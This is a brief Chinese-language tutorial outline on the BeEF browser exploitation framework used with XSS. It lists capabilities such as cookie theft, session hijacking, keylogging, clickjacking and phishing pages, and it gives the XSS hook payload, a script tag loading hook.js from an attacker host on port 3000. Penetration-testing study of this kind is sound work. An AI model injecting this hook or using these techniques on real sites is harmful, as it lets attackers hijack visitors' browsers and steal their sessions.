自动化XSS
BeEF
Browser Exploitation Framework (BeEF)
BeEF是目前最强大的浏览器开源渗透测试框架,通过XSS漏洞配合JS脚本和Metasploit进行渗透;
BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单;
http://beefproject.com/
信息收集
1.网络发现
2.主机信息
3.cookie获取
4.会话劫持
5.键盘记录
6.插件信息
持久化控制
1.确认弹窗
2.小窗口
3.中间人
社会工程
1.点击劫持
2.弹窗告警
3.虚假界面
4.钓鱼界面
渗透攻击
1.内网渗透
2.Metasploit
3.CSRF攻击
4.DDOS攻击
BeEF基础
启动Apache和BeEF
root@dillon:~# service apache2 start
Web UI: http://127.0.0.1:3000/ui/panel [*] Hook: <script src="http://<IP>:3000/hook.js"></script> [*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
BeEF端可以看到;已经连接上了;
任何访问到那个界面的人都可以被检测到;
红色命令:不能执行
灰色命令:可能执行
橙色命令; 可能会被发现
绿色命令:不会被发现
获取cookie
还有其他的各种功能;